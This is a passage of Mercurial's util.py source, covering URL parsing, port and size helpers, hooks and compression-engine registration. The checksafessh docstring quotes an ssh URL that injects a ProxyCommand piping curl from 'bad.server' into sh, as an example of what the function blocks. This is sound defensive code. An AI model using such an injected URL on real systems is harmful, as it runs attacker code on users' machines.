2956 2997 # running process on success. Instead we listen for SIGCHLD telling
2957 2998 # us our child process terminated.
2958 2999 terminated = set()
2959 3000 def handler(signum, frame):
2960 3001 terminated.add(os.wait())
2961 3002 prevhandler = None
2962 3003 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2963 3004 if SIGCHLD is not None:
2964 3005 prevhandler = signal.signal(SIGCHLD, handler)
2965 3006 try:
2966 3007 pid = spawndetached(args)
2967 3008 while not condfn():
2968 3009 if ((pid in terminated or not testpid(pid))
2969 3010 and not condfn()):
2970 3011 return -1
2971 3012 time.sleep(0.1)
2972 3013 return pid
2973 3014 finally:
2974 3015 if prevhandler is not None:
2975 3016 signal.signal(signal.SIGCHLD, prevhandler)
2976 3017
2977 3018 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2978 3019 """Return the result of interpolating items in the mapping into string s.
2979 3020
2980 3021 prefix is a single character string, or a two character string with
2981 3022 a backslash as the first character if the prefix needs to be escaped in
2982 3023 a regular expression.
2983 3024
2984 3025 fn is an optional function that will be applied to the replacement text
2985 3026 just before replacement.
2986 3027
2987 3028 escape_prefix is an optional flag that allows using doubled prefix for
2988 3029 its escaping.
2989 3030 """
2990 3031 fn = fn or (lambda s: s)
2991 3032 patterns = '|'.join(mapping.keys())
2992 3033 if escape_prefix:
2993 3034 patterns += '|' + prefix
2994 3035 if len(prefix) > 1:
2995 3036 prefix_char = prefix[1:]
2996 3037 else:
2997 3038 prefix_char = prefix
2998 3039 mapping[prefix_char] = prefix_char
2999 3040 r = remod.compile(br'%s(%s)' % (prefix, patterns))
3000 3041 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
3001 3042
3002 3043 def getport(port):
3003 3044 """Return the port for a given network service.
3004 3045
3005 3046 If port is an integer, it's returned as is. If it's a string, it's
3006 3047 looked up using socket.getservbyname(). If there's no matching
3007 3048 service, error.Abort is raised.
3008 3049 """
3009 3050 try:
3010 3051 return int(port)
3011 3052 except ValueError:
3012 3053 pass
3013 3054
3014 3055 try:
3015 3056 return socket.getservbyname(pycompat.sysstr(port))
3016 3057 except socket.error:
3017 3058 raise Abort(_("no port number associated with service '%s'") % port)
3018 3059
3019 3060 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
3020 3061 '0': False, 'no': False, 'false': False, 'off': False,
3021 3062 'never': False}
3022 3063
3023 3064 def parsebool(s):
3024 3065 """Parse s into a boolean.
3025 3066
3026 3067 If s is not a valid boolean, returns None.
3027 3068 """
3028 3069 return _booleans.get(s.lower(), None)
3029 3070
3030 3071 _hextochr = dict((a + b, chr(int(a + b, 16)))
3031 3072 for a in string.hexdigits for b in string.hexdigits)
3032 3073
3033 3074 class url(object):
3034 3075 r"""Reliable URL parser.
3035 3076
3036 3077 This parses URLs and provides attributes for the following
3037 3078 components:
3038 3079
3039 3080 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
3040 3081
3041 3082 Missing components are set to None. The only exception is
3042 3083 fragment, which is set to '' if present but empty.
3043 3084
3044 3085 If parsefragment is False, fragment is included in query. If
3045 3086 parsequery is False, query is included in path. If both are
3046 3087 False, both fragment and query are included in path.
3047 3088
3048 3089 See http://www.ietf.org/rfc/rfc2396.txt for more information.
3049 3090
3050 3091 Note that for backward compatibility reasons, bundle URLs do not
3051 3092 take host names. That means 'bundle://../' has a path of '../'.
3052 3093
3053 3094 Examples:
3054 3095
3055 3096 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
3056 3097 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
3057 3098 >>> url(b'ssh://[::1]:2200//home/joe/repo')
3058 3099 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
3059 3100 >>> url(b'file:///home/joe/repo')
3060 3101 <url scheme: 'file', path: '/home/joe/repo'>
3061 3102 >>> url(b'file:///c:/temp/foo/')
3062 3103 <url scheme: 'file', path: 'c:/temp/foo/'>
3063 3104 >>> url(b'bundle:foo')
3064 3105 <url scheme: 'bundle', path: 'foo'>
3065 3106 >>> url(b'bundle://../foo')
3066 3107 <url scheme: 'bundle', path: '../foo'>
3067 3108 >>> url(br'c:\foo\bar')
3068 3109 <url path: 'c:\\foo\\bar'>
3069 3110 >>> url(br'\\blah\blah\blah')
3070 3111 <url path: '\\\\blah\\blah\\blah'>
3071 3112 >>> url(br'\\blah\blah\blah#baz')
3072 3113 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
3073 3114 >>> url(br'file:///C:\users\me')
3074 3115 <url scheme: 'file', path: 'C:\\users\\me'>
3075 3116
3076 3117 Authentication credentials:
3077 3118
3078 3119 >>> url(b'ssh://joe:xyz@x/repo')
3079 3120 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
3080 3121 >>> url(b'ssh://joe@x/repo')
3081 3122 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
3082 3123
3083 3124 Query strings and fragments:
3084 3125
3085 3126 >>> url(b'http://host/a?b#c')
3086 3127 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
3087 3128 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
3088 3129 <url scheme: 'http', host: 'host', path: 'a?b#c'>
3089 3130
3090 3131 Empty path:
3091 3132
3092 3133 >>> url(b'')
3093 3134 <url path: ''>
3094 3135 >>> url(b'#a')
3095 3136 <url path: '', fragment: 'a'>
3096 3137 >>> url(b'http://host/')
3097 3138 <url scheme: 'http', host: 'host', path: ''>
3098 3139 >>> url(b'http://host/#a')
3099 3140 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3100 3141
3101 3142 Only scheme:
3102 3143
3103 3144 >>> url(b'http:')
3104 3145 <url scheme: 'http'>
3105 3146 """
3106 3147
3107 3148 _safechars = "!~*'()+"
3108 3149 _safepchars = "/!~*'()+:\\"
3109 3150 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
3110 3151
3111 3152 def __init__(self, path, parsequery=True, parsefragment=True):
3112 3153 # We slowly chomp away at path until we have only the path left
3113 3154 self.scheme = self.user = self.passwd = self.host = None
3114 3155 self.port = self.path = self.query = self.fragment = None
3115 3156 self._localpath = True
3116 3157 self._hostport = ''
3117 3158 self._origpath = path
3118 3159
3119 3160 if parsefragment and '#' in path:
3120 3161 path, self.fragment = path.split('#', 1)
3121 3162
3122 3163 # special case for Windows drive letters and UNC paths
3123 3164 if hasdriveletter(path) or path.startswith('\\\\'):
3124 3165 self.path = path
3125 3166 return
3126 3167
3127 3168 # For compatibility reasons, we can't handle bundle paths as
3128 3169 # normal URLS
3129 3170 if path.startswith('bundle:'):
3130 3171 self.scheme = 'bundle'
3131 3172 path = path[7:]
3132 3173 if path.startswith('//'):
3133 3174 path = path[2:]
3134 3175 self.path = path
3135 3176 return
3136 3177
3137 3178 if self._matchscheme(path):
3138 3179 parts = path.split(':', 1)
3139 3180 if parts[0]:
3140 3181 self.scheme, path = parts
3141 3182 self._localpath = False
3142 3183
3143 3184 if not path:
3144 3185 path = None
3145 3186 if self._localpath:
3146 3187 self.path = ''
3147 3188 return
3148 3189 else:
3149 3190 if self._localpath:
3150 3191 self.path = path
3151 3192 return
3152 3193
3153 3194 if parsequery and '?' in path:
3154 3195 path, self.query = path.split('?', 1)
3155 3196 if not path:
3156 3197 path = None
3157 3198 if not self.query:
3158 3199 self.query = None
3159 3200
3160 3201 # // is required to specify a host/authority
3161 3202 if path and path.startswith('//'):
3162 3203 parts = path[2:].split('/', 1)
3163 3204 if len(parts) > 1:
3164 3205 self.host, path = parts
3165 3206 else:
3166 3207 self.host = parts[0]
3167 3208 path = None
3168 3209 if not self.host:
3169 3210 self.host = None
3170 3211 # path of file:///d is /d
3171 3212 # path of file:///d:/ is d:/, not /d:/
3172 3213 if path and not hasdriveletter(path):
3173 3214 path = '/' + path
3174 3215
3175 3216 if self.host and '@' in self.host:
3176 3217 self.user, self.host = self.host.rsplit('@', 1)
3177 3218 if ':' in self.user:
3178 3219 self.user, self.passwd = self.user.split(':', 1)
3179 3220 if not self.host:
3180 3221 self.host = None
3181 3222
3182 3223 # Don't split on colons in IPv6 addresses without ports
3183 3224 if (self.host and ':' in self.host and
3184 3225 not (self.host.startswith('[') and self.host.endswith(']'))):
3185 3226 self._hostport = self.host
3186 3227 self.host, self.port = self.host.rsplit(':', 1)
3187 3228 if not self.host:
3188 3229 self.host = None
3189 3230
3190 3231 if (self.host and self.scheme == 'file' and
3191 3232 self.host not in ('localhost', '127.0.0.1', '[::1]')):
3192 3233 raise Abort(_('file:// URLs can only refer to localhost'))
3193 3234
3194 3235 self.path = path
3195 3236
3196 3237 # leave the query string escaped
3197 3238 for a in ('user', 'passwd', 'host', 'port',
3198 3239 'path', 'fragment'):
3199 3240 v = getattr(self, a)
3200 3241 if v is not None:
3201 3242 setattr(self, a, urlreq.unquote(v))
3202 3243
3203 3244 @encoding.strmethod
3204 3245 def __repr__(self):
3205 3246 attrs = []
3206 3247 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
3207 3248 'query', 'fragment'):
3208 3249 v = getattr(self, a)
3209 3250 if v is not None:
3210 3251 attrs.append('%s: %r' % (a, v))
3211 3252 return '<url %s>' % ', '.join(attrs)
3212 3253
3213 3254 def __bytes__(self):
3214 3255 r"""Join the URL's components back into a URL string.
3215 3256
3216 3257 Examples:
3217 3258
3218 3259 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3219 3260 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3220 3261 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3221 3262 'http://user:pw@host:80/?foo=bar&baz=42'
3222 3263 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3223 3264 'http://user:pw@host:80/?foo=bar%3dbaz'
3224 3265 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3225 3266 'ssh://user:pw@[::1]:2200//home/joe#'
3226 3267 >>> bytes(url(b'http://localhost:80//'))
3227 3268 'http://localhost:80//'
3228 3269 >>> bytes(url(b'http://localhost:80/'))
3229 3270 'http://localhost:80/'
3230 3271 >>> bytes(url(b'http://localhost:80'))
3231 3272 'http://localhost:80/'
3232 3273 >>> bytes(url(b'bundle:foo'))
3233 3274 'bundle:foo'
3234 3275 >>> bytes(url(b'bundle://../foo'))
3235 3276 'bundle:../foo'
3236 3277 >>> bytes(url(b'path'))
3237 3278 'path'
3238 3279 >>> bytes(url(b'file:///tmp/foo/bar'))
3239 3280 'file:///tmp/foo/bar'
3240 3281 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3241 3282 'file:///c:/tmp/foo/bar'
3242 3283 >>> print(url(br'bundle:foo\bar'))
3243 3284 bundle:foo\bar
3244 3285 >>> print(url(br'file:///D:\data\hg'))
3245 3286 file:///D:\data\hg
3246 3287 """
3247 3288 if self._localpath:
3248 3289 s = self.path
3249 3290 if self.scheme == 'bundle':
3250 3291 s = 'bundle:' + s
3251 3292 if self.fragment:
3252 3293 s += '#' + self.fragment
3253 3294 return s
3254 3295
3255 3296 s = self.scheme + ':'
3256 3297 if self.user or self.passwd or self.host:
3257 3298 s += '//'
3258 3299 elif self.scheme and (not self.path or self.path.startswith('/')
3259 3300 or hasdriveletter(self.path)):
3260 3301 s += '//'
3261 3302 if hasdriveletter(self.path):
3262 3303 s += '/'
3263 3304 if self.user:
3264 3305 s += urlreq.quote(self.user, safe=self._safechars)
3265 3306 if self.passwd:
3266 3307 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
3267 3308 if self.user or self.passwd:
3268 3309 s += '@'
3269 3310 if self.host:
3270 3311 if not (self.host.startswith('[') and self.host.endswith(']')):
3271 3312 s += urlreq.quote(self.host)
3272 3313 else:
3273 3314 s += self.host
3274 3315 if self.port:
3275 3316 s += ':' + urlreq.quote(self.port)
3276 3317 if self.host:
3277 3318 s += '/'
3278 3319 if self.path:
3279 3320 # TODO: similar to the query string, we should not unescape the
3280 3321 # path when we store it, the path might contain '%2f' = '/',
3281 3322 # which we should *not* escape.
3282 3323 s += urlreq.quote(self.path, safe=self._safepchars)
3283 3324 if self.query:
3284 3325 # we store the query in escaped form.
3285 3326 s += '?' + self.query
3286 3327 if self.fragment is not None:
3287 3328 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3288 3329 return s
3289 3330
3290 3331 __str__ = encoding.strmethod(__bytes__)
3291 3332
3292 3333 def authinfo(self):
3293 3334 user, passwd = self.user, self.passwd
3294 3335 try:
3295 3336 self.user, self.passwd = None, None
3296 3337 s = bytes(self)
3297 3338 finally:
3298 3339 self.user, self.passwd = user, passwd
3299 3340 if not self.user:
3300 3341 return (s, None)
3301 3342 # authinfo[1] is passed to urllib2 password manager, and its
3302 3343 # URIs must not contain credentials. The host is passed in the
3303 3344 # URIs list because Python < 2.4.3 uses only that to search for
3304 3345 # a password.
3305 3346 return (s, (None, (s, self.host),
3306 3347 self.user, self.passwd or ''))
3307 3348
3308 3349 def isabs(self):
3309 3350 if self.scheme and self.scheme != 'file':
3310 3351 return True # remote URL
3311 3352 if hasdriveletter(self.path):
3312 3353 return True # absolute for our purposes - can't be joined()
3313 3354 if self.path.startswith(br'\\'):
3314 3355 return True # Windows UNC path
3315 3356 if self.path.startswith('/'):
3316 3357 return True # POSIX-style
3317 3358 return False
3318 3359
3319 3360 def localpath(self):
3320 3361 if self.scheme == 'file' or self.scheme == 'bundle':
3321 3362 path = self.path or '/'
3322 3363 # For Windows, we need to promote hosts containing drive
3323 3364 # letters to paths with drive letters.
3324 3365 if hasdriveletter(self._hostport):
3325 3366 path = self._hostport + '/' + self.path
3326 3367 elif (self.host is not None and self.path
3327 3368 and not hasdriveletter(path)):
3328 3369 path = '/' + path
3329 3370 return path
3330 3371 return self._origpath
3331 3372
3332 3373 def islocal(self):
3333 3374 '''whether localpath will return something that posixfile can open'''
3334 3375 return (not self.scheme or self.scheme == 'file'
3335 3376 or self.scheme == 'bundle')
3336 3377
3337 3378 def hasscheme(path):
3338 3379 return bool(url(path).scheme)
3339 3380
3340 3381 def hasdriveletter(path):
3341 3382 return path and path[1:2] == ':' and path[0:1].isalpha()
3342 3383
3343 3384 def urllocalpath(path):
3344 3385 return url(path, parsequery=False, parsefragment=False).localpath()
3345 3386
3346 3387 def checksafessh(path):
3347 3388 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3348 3389
3349 3390 This is a sanity check for ssh urls. ssh will parse the first item as
3350 3391 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3351 3392 Let's prevent these potentially exploited urls entirely and warn the
3352 3393 user.
3353 3394
3354 3395 Raises an error.Abort when the url is unsafe.
3355 3396 """
3356 3397 path = urlreq.unquote(path)
3357 3398 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3358 3399 raise error.Abort(_('potentially unsafe url: %r') %
3359 3400 (pycompat.bytestr(path),))
3360 3401
3361 3402 def hidepassword(u):
3362 3403 '''hide user credential in a url string'''
3363 3404 u = url(u)
3364 3405 if u.passwd:
3365 3406 u.passwd = '***'
3366 3407 return bytes(u)
3367 3408
3368 3409 def removeauth(u):
3369 3410 '''remove all authentication information from a url string'''
3370 3411 u = url(u)
3371 3412 u.user = u.passwd = None
3372 3413 return str(u)
3373 3414
3374 3415 timecount = unitcountfn(
3375 3416 (1, 1e3, _('%.0f s')),
3376 3417 (100, 1, _('%.1f s')),
3377 3418 (10, 1, _('%.2f s')),
3378 3419 (1, 1, _('%.3f s')),
3379 3420 (100, 0.001, _('%.1f ms')),
3380 3421 (10, 0.001, _('%.2f ms')),
3381 3422 (1, 0.001, _('%.3f ms')),
3382 3423 (100, 0.000001, _('%.1f us')),
3383 3424 (10, 0.000001, _('%.2f us')),
3384 3425 (1, 0.000001, _('%.3f us')),
3385 3426 (100, 0.000000001, _('%.1f ns')),
3386 3427 (10, 0.000000001, _('%.2f ns')),
3387 3428 (1, 0.000000001, _('%.3f ns')),
3388 3429 )
3389 3430
3390 3431 _timenesting = [0]
3391 3432
3392 3433 def timed(func):
3393 3434 '''Report the execution time of a function call to stderr.
3394 3435
3395 3436 During development, use as a decorator when you need to measure
3396 3437 the cost of a function, e.g. as follows:
3397 3438
3398 3439 @util.timed
3399 3440 def foo(a, b, c):
3400 3441 pass
3401 3442 '''
3402 3443
3403 3444 def wrapper(*args, **kwargs):
3404 3445 start = timer()
3405 3446 indent = 2
3406 3447 _timenesting[0] += indent
3407 3448 try:
3408 3449 return func(*args, **kwargs)
3409 3450 finally:
3410 3451 elapsed = timer() - start
3411 3452 _timenesting[0] -= indent
3412 3453 stderr.write('%s%s: %s\n' %
3413 3454 (' ' * _timenesting[0], func.__name__,
3414 3455 timecount(elapsed)))
3415 3456 return wrapper
3416 3457
3417 3458 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3418 3459 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3419 3460
3420 3461 def sizetoint(s):
3421 3462 '''Convert a space specifier to a byte count.
3422 3463
3423 3464 >>> sizetoint(b'30')
3424 3465 30
3425 3466 >>> sizetoint(b'2.2kb')
3426 3467 2252
3427 3468 >>> sizetoint(b'6M')
3428 3469 6291456
3429 3470 '''
3430 3471 t = s.strip().lower()
3431 3472 try:
3432 3473 for k, u in _sizeunits:
3433 3474 if t.endswith(k):
3434 3475 return int(float(t[:-len(k)]) * u)
3435 3476 return int(t)
3436 3477 except ValueError:
3437 3478 raise error.ParseError(_("couldn't parse size: %s") % s)
3438 3479
3439 3480 class hooks(object):
3440 3481 '''A collection of hook functions that can be used to extend a
3441 3482 function's behavior. Hooks are called in lexicographic order,
3442 3483 based on the names of their sources.'''
3443 3484
3444 3485 def __init__(self):
3445 3486 self._hooks = []
3446 3487
3447 3488 def add(self, source, hook):
3448 3489 self._hooks.append((source, hook))
3449 3490
3450 3491 def __call__(self, *args):
3451 3492 self._hooks.sort(key=lambda x: x[0])
3452 3493 results = []
3453 3494 for source, hook in self._hooks:
3454 3495 results.append(hook(*args))
3455 3496 return results
3456 3497
3457 3498 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3458 3499 '''Yields lines for a nicely formatted stacktrace.
3459 3500 Skips the 'skip' last entries, then return the last 'depth' entries.
3460 3501 Each file+linenumber is formatted according to fileline.
3461 3502 Each line is formatted according to line.
3462 3503 If line is None, it yields:
3463 3504 length of longest filepath+line number,
3464 3505 filepath+linenumber,
3465 3506 function
3466 3507
3467 3508 Not be used in production code but very convenient while developing.
3468 3509 '''
3469 3510 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3470 3511 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3471 3512 ][-depth:]
3472 3513 if entries:
3473 3514 fnmax = max(len(entry[0]) for entry in entries)
3474 3515 for fnln, func in entries:
3475 3516 if line is None:
3476 3517 yield (fnmax, fnln, func)
3477 3518 else:
3478 3519 yield line % (fnmax, fnln, func)
3479 3520
3480 3521 def debugstacktrace(msg='stacktrace', skip=0,
3481 3522 f=stderr, otherf=stdout, depth=0):
3482 3523 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3483 3524 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3484 3525 By default it will flush stdout first.
3485 3526 It can be used everywhere and intentionally does not require an ui object.
3486 3527 Not be used in production code but very convenient while developing.
3487 3528 '''
3488 3529 if otherf:
3489 3530 otherf.flush()
3490 3531 f.write('%s at:\n' % msg.rstrip())
3491 3532 for line in getstackframes(skip + 1, depth=depth):
3492 3533 f.write(line)
3493 3534 f.flush()
3494 3535
3495 3536 class dirs(object):
3496 3537 '''a multiset of directory names from a dirstate or manifest'''
3497 3538
3498 3539 def __init__(self, map, skip=None):
3499 3540 self._dirs = {}
3500 3541 addpath = self.addpath
3501 3542 if safehasattr(map, 'iteritems') and skip is not None:
3502 3543 for f, s in map.iteritems():
3503 3544 if s[0] != skip:
3504 3545 addpath(f)
3505 3546 else:
3506 3547 for f in map:
3507 3548 addpath(f)
3508 3549
3509 3550 def addpath(self, path):
3510 3551 dirs = self._dirs
3511 3552 for base in finddirs(path):
3512 3553 if base in dirs:
3513 3554 dirs[base] += 1
3514 3555 return
3515 3556 dirs[base] = 1
3516 3557
3517 3558 def delpath(self, path):
3518 3559 dirs = self._dirs
3519 3560 for base in finddirs(path):
3520 3561 if dirs[base] > 1:
3521 3562 dirs[base] -= 1
3522 3563 return
3523 3564 del dirs[base]
3524 3565
3525 3566 def __iter__(self):
3526 3567 return iter(self._dirs)
3527 3568
3528 3569 def __contains__(self, d):
3529 3570 return d in self._dirs
3530 3571
3531 3572 if safehasattr(parsers, 'dirs'):
3532 3573 dirs = parsers.dirs
3533 3574
3534 3575 def finddirs(path):
3535 3576 pos = path.rfind('/')
3536 3577 while pos != -1:
3537 3578 yield path[:pos]
3538 3579 pos = path.rfind('/', 0, pos)
3539 3580
3540 3581 # compression code
3541 3582
3542 3583 SERVERROLE = 'server'
3543 3584 CLIENTROLE = 'client'
3544 3585
3545 3586 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3546 3587 (u'name', u'serverpriority',
3547 3588 u'clientpriority'))
3548 3589
3549 3590 class compressormanager(object):
3550 3591 """Holds registrations of various compression engines.
3551 3592
3552 3593 This class essentially abstracts the differences between compression
3553 3594 engines to allow new compression formats to be added easily, possibly from
3554 3595 extensions.
3555 3596
3556 3597 Compressors are registered against the global instance by calling its
3557 3598 ``register()`` method.
3558 3599 """
3559 3600 def __init__(self):
3560 3601 self._engines = {}
3561 3602 # Bundle spec human name to engine name.
3562 3603 self._bundlenames = {}
3563 3604 # Internal bundle identifier to engine name.
3564 3605 self._bundletypes = {}
3565 3606 # Revlog header to engine name.
3566 3607 self._revlogheaders = {}
3567 3608 # Wire proto identifier to engine name.
3568 3609 self._wiretypes = {}
3569 3610
3570 3611 def __getitem__(self, key):
3571 3612 return self._engines[key]
3572 3613
3573 3614 def __contains__(self, key):
3574 3615 return key in self._engines
3575 3616
3576 3617 def __iter__(self):
3577 3618 return iter(self._engines.keys())
3578 3619
3579 3620 def register(self, engine):
3580 3621 """Register a compression engine with the manager.
3581 3622
3582 3623 The argument must be a ``compressionengine`` instance.
3583 3624 """
3584 3625 if not isinstance(engine, compressionengine):
3585 3626 raise ValueError(_('argument must be a compressionengine'))
3586 3627
3587 3628 name = engine.name()
3588 3629
3589 3630 if name in self._engines:
3590 3631 raise error.Abort(_('compression engine %s already registered') %
3591 3632 name)
3592 3633
3593 3634 bundleinfo = engine.bundletype()
3594 3635 if bundleinfo:
3595 3636 bundlename, bundletype = bundleinfo
3596 3637
3597 3638 if bundlename in self._bundlenames:
3598 3639 raise error.Abort(_('bundle name %s already registered') %
3599 3640 bundlename)
3600 3641 if bundletype in self._bundletypes:
3601 3642 raise error.Abort(_('bundle type %s already registered by %s') %
3602 3643 (bundletype, self._bundletypes[bundletype]))
3603 3644
3604 3645 # No external facing name declared.
3605 3646 if bundlename:
3606 3647 self._bundlenames[bundlename] = name
3607 3648
3608 3649 self._bundletypes[bundletype] = name
3609 3650
3610 3651 wiresupport = engine.wireprotosupport()
3611 3652 if wiresupport:
3612 3653 wiretype = wiresupport.name
3613 3654 if wiretype in self._wiretypes:
3614 3655 raise error.Abort(_('wire protocol compression %s already '
3615 3656 'registered by %s') %
3616 3657 (wiretype, self._wiretypes[wiretype]))
3617 3658
3618 3659 self._wiretypes[wiretype] = name
3619 3660
3620 3661 revlogheader = engine.revlogheader()
3621 3662 if revlogheader and revlogheader in self._revlogheaders:
3622 3663 raise error.Abort(_('revlog header %s already registered by %s') %
3623 3664 (revlogheader, self._revlogheaders[revlogheader]))
3624 3665
3625 3666 if revlogheader:
3626 3667 self._revlogheaders[revlogheader] = name
3627 3668
3628 3669 self._engines[name] = engine
3629 3670
3630 3671 @property
3631 3672 def supportedbundlenames(self):
3632 3673 return set(self._bundlenames.keys())
3633 3674
3634 3675 @property
3635 3676 def supportedbundletypes(self):
3636 3677 return set(self._bundletypes.keys())
3637 3678
3638 3679 def forbundlename(self, bundlename):
3639 3680 """Obtain a compression engine registered to a bundle name.
3640 3681
3641 3682 Will raise KeyError if the bundle type isn't registered.
3642 3683
3643 3684 Will abort if the engine is known but not available.
3644 3685 """
3645 3686 engine = self._engines[self._bundlenames[bundlename]]
3646 3687 if not engine.available():
3647 3688 raise error.Abort(_('compression engine %s could not be loaded') %
3648 3689 engine.name())
3649 3690 return engine
3650 3691
3651 3692 def forbundletype(self, bundletype):
3652 3693 """Obtain a compression engine registered to a bundle type.
3653 3694
3654 3695 Will raise KeyError if the bundle type isn't registered.
3655 3696
3656 3697 Will abort if the engine is known but not available.
3657 3698 """
3658 3699 engine = self._engines[self._bundletypes[bundletype]]
3659 3700 if not engine.available():
3660 3701 raise error.Abort(_('compression engine %s could not be loaded') %
3661 3702 engine.name())
3662 3703 return engine
3663 3704
3664 3705 def supportedwireengines(self, role, onlyavailable=True):
3665 3706 """Obtain compression engines that support the wire protocol.
3666 3707
3667 3708 Returns a list of engines in prioritized order, most desired first.
3668 3709
3669 3710 If ``onlyavailable`` is set, filter out engines that can't be
3670 3711 loaded.
3671 3712 """
3672 3713 assert role in (SERVERROLE, CLIENTROLE)
3673 3714
3674 3715 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3675 3716
3676 3717 engines = [self._engines[e] for e in self._wiretypes.values()]
3677 3718 if onlyavailable:
3678 3719 engines = [e for e in engines if e.available()]
3679 3720
3680 3721 def getkey(e):
3681 3722 # Sort first by priority, highest first. In case of tie, sort
3682 3723 # alphabetically. This is arbitrary, but ensures output is
3683 3724 # stable.
3684 3725 w = e.wireprotosupport()
3685 3726 return -1 * getattr(w, attr), w.name
3686 3727
3687 3728 return list(sorted(engines, key=getkey))
3688 3729
3689 3730 def forwiretype(self, wiretype):
3690 3731 engine = self._engines[self._wiretypes[wiretype]]
3691 3732 if not engine.available():
3692 3733 raise error.Abort(_('compression engine %s could not be loaded') %
3693 3734 engine.name())
3694 3735 return engine
3695 3736
3696 3737 def forrevlogheader(self, header):
3697 3738 """Obtain a compression engine registered to a revlog header.
3698 3739
3699 3740 Will raise KeyError if the revlog header value isn't registered.
3700 3741 """
3701 3742 return self._engines[self._revlogheaders[header]]
3702 3743
3703 3744 compengines = compressormanager()
3704 3745
3705 3746 class compressionengine(object):
3706 3747 """Base class for compression engines.
3707 3748
3708 3749 Compression engines must implement the interface defined by this class.
3709 3750 """
3710 3751 def name(self):
3711 3752 """Returns the name of the compression engine.
3712 3753
3713 3754 This is the key the engine is registered under.
3714 3755
3715 3756 This method must be implemented.
3716 3757 """
3717 3758 raise NotImplementedError()
3718 3759
3719 3760 def available(self):
3720 3761 """Whether the compression engine is available.
3721 3762
3722 3763 The intent of this method is to allow optional compression engines
3723 3764 that may not be available in all installations (such as engines relying
3724 3765 on C extensions that may not be present).
3725 3766 """
3726 3767 return True
3727 3768
3728 3769 def bundletype(self):
3729 3770 """Describes bundle identifiers for this engine.
3730 3771
3731 3772 If this compression engine isn't supported for bundles, returns None.
3732 3773
3733 3774 If this engine can be used for bundles, returns a 2-tuple of strings of
3734 3775 the user-facing "bundle spec" compression name and an internal
3735 3776 identifier used to denote the compression format within bundles. To
3736 3777 exclude the name from external usage, set the first element to ``None``.
3737 3778
3738 3779 If bundle compression is supported, the class must also implement
3739 3780 ``compressstream`` and `decompressorreader``.
3740 3781
3741 3782 The docstring of this method is used in the help system to tell users
3742 3783 about this engine.
3743 3784 """
3744 3785 return None
3745 3786
3746 3787 def wireprotosupport(self):
3747 3788 """Declare support for this compression format on the wire protocol.
3748 3789
3749 3790 If this compression engine isn't supported for compressing wire
3750 3791 protocol payloads, returns None.
3751 3792
3752 3793 Otherwise, returns ``compenginewireprotosupport`` with the following
3753 3794 fields:
3754 3795
3755 3796 * String format identifier
3756 3797 * Integer priority for the server
3757 3798 * Integer priority for the client
3758 3799
3759 3800 The integer priorities are used to order the advertisement of format
3760 3801 support by server and client. The highest integer is advertised
3761 3802 first. Integers with non-positive values aren't advertised.
3762 3803
3763 3804 The priority values are somewhat arbitrary and only used for default
3764 3805 ordering. The relative order can be changed via config options.
3765 3806
3766 3807 If wire protocol compression is supported, the class must also implement
3767 3808 ``compressstream`` and ``decompressorreader``.
3768 3809 """
3769 3810 return None
3770 3811
3771 3812 def revlogheader(self):
3772 3813 """Header added to revlog chunks that identifies this engine.
3773 3814
3774 3815 If this engine can be used to compress revlogs, this method should
3775 3816 return the bytes used to identify chunks compressed with this engine.
3776 3817 Else, the method should return ``None`` to indicate it does not
3777 3818 participate in revlog compression.
3778 3819 """
3779 3820 return None
3780 3821
3781 3822 def compressstream(self, it, opts=None):
3782 3823 """Compress an iterator of chunks.
3783 3824
3784 3825 The method receives an iterator (ideally a generator) of chunks of
3785 3826 bytes to be compressed. It returns an iterator (ideally a generator)
3786 3827 of bytes of chunks representing the compressed output.
3787 3828
3788 3829 Optionally accepts an argument defining how to perform compression.
3789 3830 Each engine treats this argument differently.
3790 3831 """
3791 3832 raise NotImplementedError()
3792 3833
3793 3834 def decompressorreader(self, fh):
3794 3835 """Perform decompression on a file object.
3795 3836
3796 3837 Argument is an object with a ``read(size)`` method that returns
3797 3838 compressed data. Return value is an object with a ``read(size)`` that
3798 3839 returns uncompressed data.
3799 3840 """
3800 3841 raise NotImplementedError()
3801 3842
3802 3843 def revlogcompressor(self, opts=None):
3803 3844 """Obtain an object that can be used to compress revlog entries.
3804 3845
3805 3846 The object has a ``compress(data)`` method that compresses binary
3806 3847 data. This method returns compressed binary data or ``None`` if
